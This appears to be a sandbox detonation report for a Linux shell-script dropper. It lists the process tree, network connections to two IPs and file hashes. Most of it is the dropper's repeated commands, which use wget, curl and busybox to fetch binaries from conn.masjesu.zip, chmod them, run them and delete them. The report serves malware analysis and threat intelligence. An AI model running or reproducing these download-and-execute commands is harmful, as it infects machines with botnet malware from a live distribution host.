[/tmp/cae0f3aa5baf5db3fa86dff484e23996d5cf8abbf537303d56d7ef7b2003e5ca.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/chmod

[chmod 777 WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG

[./WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/rm

[rm WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/chmod

[chmod 777 FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx

[./FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/rm

[rm FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/chmod

[chmod 777 JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx

[./JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/rm

[rm JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/chmod

[chmod 777 BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa

[./BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/rm

[rm BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/chmod

[chmod 777 tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN

[./tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/rm

[rm tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/chmod

[chmod 777 idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4

[./idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/rm

[rm idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/chmod

[chmod 777 mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1

[./mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/rm

[rm mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/chmod

[chmod 777 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8

[./4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/rm

[rm 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/chmod

[chmod 777 DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT

[./DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/rm

[rm DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/chmod

[chmod 777 teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz

[./teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/rm

[rm teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/chmod

[chmod 777 PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx

[./PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/rm

[rm PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/chmod

[chmod 777 ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m

[./ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/rm

[rm ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/chmod

[chmod 777 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS

[./2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/rm

[rm 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/chmod

[chmod 777 zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh

[./zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/rm

[rm zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/chmod

[chmod 777 mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/tmp/mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1

[./mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/bin/rm

[rm mCr9mPdN28V3Gp6Rv8cn31xESvvDYL3Fa1]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/chmod

[chmod 777 WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG

[./WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/bin/rm

[rm WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/chmod

[chmod 777 FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/tmp/FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx

[./FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/bin/rm

[rm FGPPjJkNp6juPupFXpnlM5Pk4GQ1XOfedx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/chmod

[chmod 777 JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/tmp/JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx

[./JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/bin/rm

[rm JvxUArkHjLKhR0iDE16tTHEkSvlg7mtrHx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/chmod

[chmod 777 BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/tmp/BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa

[./BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/bin/rm

[rm BPME29EV9N6hmmo6w85WDzBep2U2iy0cWa]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/chmod

[chmod 777 tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/tmp/tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN

[./tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/bin/rm

[rm tfulUtiwcGoNnKWNTxI5ZM0AYRs4bKf9cN]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/chmod

[chmod 777 idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/tmp/idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4

[./idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/bin/rm

[rm idnGNyuDmgXtrrMK2gSYIIEEESp0hj15J4]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/chmod

[chmod 777 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/tmp/4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8

[./4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/bin/rm

[rm 4rHixWyNmsx0szqzpWJaZeoKyOAcs3oON8]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/chmod

[chmod 777 DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/tmp/DQul2qKd09ITKkHJpETty8DirCA07F1nBT

[./DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/bin/rm

[rm DQul2qKd09ITKkHJpETty8DirCA07F1nBT]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/chmod

[chmod 777 zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/tmp/zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh

[./zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/bin/rm

[rm zbq5Y476dvNQ394RN8IM6UoW9NRkMhg9Rh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/chmod

[chmod 777 teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/tmp/teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz

[./teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/bin/rm

[rm teb0EwBkAsUTRHDbmUU61VmaAQLtJ4tHdz]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/chmod

[chmod 777 PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/tmp/PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx

[./PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/bin/rm

[rm PU2Tx3XhB135BQdHCubzS3AEjqVMNEEoWx]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/chmod

[chmod 777 ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/tmp/ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m

[./ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/bin/rm

[rm ixEc8Uo2OgF5hXDmp3rvN61CxWLaS6oa2m]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/chmod

[chmod 777 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/tmp/2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS

[./2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

/bin/rm

[rm 2uBrEuvqADi118fB1BE0Xz2VKKetNSOIFS]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/WWIuThY9sKOfz9sJyVMRJ8FKDPdMDEkMNG

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-20 03:24

Reported

2024-11-20 03:26

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

149s

Max time network

131s

Command Line

